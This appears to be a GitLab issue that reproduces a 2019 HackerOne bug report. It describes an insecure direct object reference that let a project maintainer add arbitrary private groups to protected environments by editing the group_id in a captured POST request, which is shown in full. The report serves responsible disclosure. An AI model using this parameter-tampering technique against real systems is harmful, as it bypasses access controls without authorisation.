Skip to content

IDOR in adding groups to protected environments

HackerOne report #566216 by ashish_r_padelkar on 2019-05-04, assigned to estrike:

Summary

Hello,

This issue is similar to https://gitlab.com/gitlab-org/gitlab-ce/issues/52409. However, there is No API for protected environment which leaks this group names yet but i think you should fix this before any API releases for the same.

There is an IDOR issue while adding groups to protected environment and any private groups can be added.

Steps to reproduce

  1. As a project Maintainer, go to `https://gitlab.com///settings/ci_cd#js-protected-environments-settings1

  2. Add any group first to protect which is already shared with this project. and capture the belwo request.

POST /<UserName>/<ProjectName>/protected_environments HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 213  
Accept: application/json, text/plain, */*  
Origin: https://gitlab.com  
X-CSRF-Token: 1  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Referer: 1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: 1

{"authenticity_token":"1","protected_environment":{"name":"qqqqqqw","deploy_access_levels_attributes":[{"group_id":4962333}]}}

  1. Now change the value of group_id parameter in above request to private group ID

  2. This will add the protected environment

  3. You can verify that the group has been added by inspecting element of the browser like below
    Screenshot_2019-05-04_at_17.22.42.png

What is the current bug behavior?

IDOR which allows adding any private group to protected environments

What is the expected correct behavior?

Only groups which are shared with projects should be allowed

Output of checks

This bug happens on GitLab.com and probably on omnibus installations too!

Regards,
Ashish

Impact

IDOR in adding any group to protected environments. This doesn't reveal the group name yet as there is no API for protected environment but i think you should fix this before you implement one!

Attachments

Warning: Attachments received through HackerOne, please exercise caution!